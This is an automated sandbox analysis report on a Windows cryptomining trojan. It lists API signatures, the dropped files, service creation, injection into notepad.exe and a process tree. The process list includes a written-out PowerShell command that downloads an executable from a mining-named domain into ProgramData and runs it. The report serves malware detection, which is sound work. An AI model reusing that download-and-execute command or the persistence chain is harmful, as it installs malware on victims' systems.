Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_0000000140003BA4 NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,	0_2_0000000140003BA4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED78C0 RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,NtClose,	9_1_00ED78C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED2DD0 GetLastError,NtOpenSection,NtMapViewOfSection,	9_1_00ED2DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED3580 NtCreateFile,NtCreateFile,	9_1_00ED3580
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED3B00 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,	9_1_00ED3B00
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED6710 GetModuleFileNameW,RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,NtClose,VirtualAlloc,NtClose,NtReadFile,NtClose,VirtualFree,NtClose,RtlDosPathNameToNtPathName_U,VirtualFree,NtCreateFile,NtWriteFile,NtClose,VirtualFree,NtClose,VirtualFree,DeleteFileW,	9_1_00ED6710
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED34E0 NtCreateFile,	9_1_00ED34E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED4DF0 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,	9_1_00ED4DF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED39B0 NtClose,	9_1_00ED39B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED3640 RtlDosPathNameToNtPathName_U,NtCreateFile,GetFileSizeEx,VirtualAlloc,NtReadFile,NtClose,VirtualFree,NtClose,VirtualFree,NtClose,	9_1_00ED3640
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED7A40 NtOpenProcess,NtTerminateProcess,NtClose,	9_1_00ED7A40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED6C40 RtlDosPathNameToNtPathName_U,NtCreateFile,	9_1_00ED6C40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED7B40 NtOpenProcess,GetExitCodeProcess,NtClose,NtClose,	9_1_00ED7B40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED2920 RtlImageNtHeader,NtOpenProcess,NtClose,NtAllocateVirtualMemory,VirtualAlloc,GetProcAddress,NtWriteVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,RtlCreateUserThread,NtWaitForSingleObject,GetExitCodeThread,NtClose,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtFreeVirtualMemory,NtClose,VirtualFree,NtFreeVirtualMemory,NtClose,	9_1_00ED2920
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED3A20 NtCreateFile,NtWriteFile,NtClose,NtClose,	9_1_00ED3A20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: 9_1_00ED6B00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,	9_1_00ED6B00

Contains functionality to communicate with device drivers

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE7774C: wcscpy,CreateFileW,CloseHandle,CreateDirectoryW,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

5_1_000000013FE7774C

Contains functionality to delete services

Source: C:\ProgramData\playersclub\LaunchServ.exe

Code function: 12_2_00401B19 GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_00454A60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

6_2_00454A60

Creates files inside the system directory

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat

Creates mutexes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Mutant created: \Sessions\1\BaseNamedObjects\e634df069f8104f8cca5

Detected potential crypto function

Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_0000000140003CB0	0_2_0000000140003CB0
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_2_00000001400060CC	0_2_00000001400060CC
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Code function: 0_1_000000014000F4B0	0_1_000000014000F4B0
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE78EBC	5_1_000000013FE78EBC
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE8EE08	5_1_000000013FE8EE08
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE8DCCC	5_1_000000013FE8DCCC
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE71AB0	5_1_000000013FE71AB0
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9099C	5_1_000000013FE9099C
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE728B4	5_1_000000013FE728B4
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7774C	5_1_000000013FE7774C
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9E760	5_1_000000013FE9E760
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE84F14	5_1_000000013FE84F14
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE746C4	5_1_000000013FE746C4
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE97690	5_1_000000013FE97690
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE85650	5_1_000000013FE85650
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7CD34	5_1_000000013FE7CD34
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7ED10	5_1_000000013FE7ED10
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE80508	5_1_000000013FE80508
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9EC30	5_1_000000013FE9EC30
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE9C424	5_1_000000013FE9C424
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE73414	5_1_000000013FE73414
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE89BB4	5_1_000000013FE89BB4
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE96360	5_1_000000013FE96360
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7F2A8	5_1_000000013FE7F2A8
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE742AC	5_1_000000013FE742AC
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE89264	5_1_000000013FE89264
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE99268	5_1_000000013FE99268
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE85248	5_1_000000013FE85248
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE859CC	5_1_000000013FE859CC
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE8A8D8	5_1_000000013FE8A8D8
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7E8BC	5_1_000000013FE7E8BC
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FEA2828	5_1_000000013FEA2828
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE76008	5_1_000000013FE76008
Source: C:\ProgramData\Win.exe	Code function: 5_1_000000013FE7F7F8	5_1_000000013FE7F7F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00401384	6_2_00401384
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0048C090	6_2_0048C090
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004940A5	6_2_004940A5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00490167	6_2_00490167
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00433120	6_2_00433120
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004801E5	6_2_004801E5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0041E1F0	6_2_0041E1F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_004581B0	6_2_004581B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0048727E	6_2_0048727E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00442290	6_2_00442290
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00480455	6_2_00480455
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00482400	6_2_00482400
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0049B56D	6_2_0049B56D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0041A5B0	6_2_0041A5B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00497688	6_2_00497688
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00440700	6_2_00440700
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0043D7C0	6_2_0043D7C0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00416840	6_2_00416840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00430840	6_2_00430840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0047F8DB	6_2_0047F8DB
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00438890	6_2_00438890
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0041C8B0	6_2_0041C8B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0040D9B0	6_2_0040D9B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00404AE0	6_2_00404AE0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0041FAB0	6_2_0041FAB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0043BAB0	6_2_0043BAB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00497BD9	6_2_00497BD9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00412BF0	6_2_00412BF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0041EC30	6_2_0041EC30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0047CCF0	6_2_0047CCF0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00446C90	6_2_00446C90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0049CCB0	6_2_0049CCB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00498D25	6_2_00498D25
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00473DD0	6_2_00473DD0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0042CDA0	6_2_0042CDA0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_0049AE91	6_2_0049AE91
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: 6_2_00406F70	6_2_00406F70

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Code function: String function: 00ED2F10 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 0048E247 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 00474580 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 00492450 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 0048D9F9 appears 375 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 0042E400 appears 185 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 00474620 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 0042E140 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Code function: String function: 004991F0 appears 38 times

PE file contains strange resources

Source: Win.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Win.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cudart64_80.dll.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: LaunchServ.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\notepad.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample file is different than original file name gathered from version info

Source: iaejSdZgD3.exe, 00000000.00000002.14291565563.0000000001BF0000.00000008.sdmp	Binary or memory string: originalfilename vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291565563.0000000001BF0000.00000008.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291590518.0000000001C10000.00000008.sdmp	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs iaejSdZgD3.exe
Source: iaejSdZgD3.exe, 00000000.00000002.14291318043.0000000000610000.00000002.sdmp	Binary or memory string: System.OriginalFileName vs iaejSdZgD3.exe

Sample reads its own file content

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

File read: C:\Users\user\Desktop\iaejSdZgD3.exe

Tries to load missing DLLs

Source: C:\ProgramData\Win.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\ProgramData\Win.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\ProgramData\Win.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\ProgramData\Win.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\ProgramData\Win.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@25/79@2/3

Contains functionality for error logging

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_0042EF10 __wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,CreateProcessW,CloseHandle,CloseHandle,GetLastError,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,GetLastError,FormatMessageW,

6_2_0042EF10

Contains functionality to adjust token privileges (e.g. debug / backup)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_00454A60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

6_2_00454A60

Contains functionality to check free disk space

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_0043E600 _wcsncpy,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

6_2_0043E600

Contains functionality to create services

Source: C:\ProgramData\playersclub\LaunchServ.exe

Code function: GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,

Contains functionality to enum processes or threads

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe

Code function: 9_1_00ED7680 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

9_1_00ED7680

Contains functionality to instantiate COM classes

Source: C:\ProgramData\Win.exe

Code function: 5_1_000000013FE8C9B8 CoCreateInstance,

5_1_000000013FE8C9B8

Contains functionality to load and extract PE file embedded resources

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe

Code function: 6_2_004762B0 SystemParametersInfoW,LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,ExtractIconW,

6_2_004762B0

Contains functionality to modify services (start/stop/modify)

Source: C:\ProgramData\playersclub\LaunchServ.exe

Contains functionality to register a service control handler (likely the sample is a service DLL)

Source: C:\ProgramData\playersclub\LaunchServ.exe

Creates files inside the user directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations

Creates temporary files

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

File created: C:\Users\user\AppData\Local\Temp\1

Executes batch files

Source: unknown

Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'

Found command line output

Source: C:\Windows\System32\cmd.exe	Console Write: `.......pB...............iHJ......!......................................;GJ......................!.....................0......./........B......	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write:	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: H&(.....................[..J....xm...6..........`m(......................`.J.....'(.............................................................	Jump to behavior

Might use command line arguments

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: /restart	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: /force	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: /ErrorStdOut	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: AutoHotkey	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: AutoHotkey	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: Clipboard	6_2_00403A90
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Command line argument: Clipboard	6_2_00403A90

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Reads software policies

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Sample is known by Antivirus

Source: iaejSdZgD3.exe

virustotal: Detection: 67%

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\iaejSdZgD3.exe 'C:\Users\user\Desktop\iaejSdZgD3.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'
Source: unknown	Process created: C:\ProgramData\Win.exe c:\ProgramData\Win.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe 'C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\RarSFX0\run.bat' '
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe'
Source: unknown	Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\qswGutmnEr\cfg'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe'
Source: unknown	Process created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-install'
Source: unknown	Process created: C:\ProgramData\playersclub\LaunchServ.exe C:\ProgramData\playersclub\LaunchServ.exe
Source: unknown	Process created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-start'
Source: unknown	Process created: C:\ProgramData\playersclub\systemSpawn.exe unknown
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: C:\Users\user\Desktop\iaejSdZgD3.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Win.exe c:\ProgramData\Win.exe	Jump to behavior
Source: C:\ProgramData\Win.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe 'C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe	Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\qswGutmnEr\cfg'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-install'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe	Process created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-start'
Source: C:\ProgramData\playersclub\LaunchServ.exe	Process created: C:\ProgramData\playersclub\systemSpawn.exe unknown

Uses an in-process (OLE) Automation server

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Writes ini files

Source: C:\ProgramData\Win.exe

File written: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\LaunchServ.ini

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

PE file has a high image base, often used for DLLs

Source: iaejSdZgD3.exe

Static PE information: Image base 0x140000000 > 0x60000000

Uses new MSVCR Dlls

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80.dll

Binary contains paths to debug symbols

Source:	Binary string: vcruntime140.amd64.pdbGCTL source: vcruntime140.dll.6.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Win.exe, 00000005.00000000.14289470007.000000013FEA4000.00000002.sdmp
Source:	Binary string: I:\Ross\workspace\PTHREADS.sourceware.org\pthreads.2\pthreadVC2.pdb source: pthreadVC2.dll.6.dr
Source:	Binary string: vcruntime140.amd64.pdb source: vcruntime140.dll.6.dr
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.14283518510.0000000002670000.00000002.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\iaejSdZgD3.exe

Code function: 0_2_0000000140004B58 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0000000140004B58

File is packed with WinRar

Source: C:\ProgramData\Win.exe

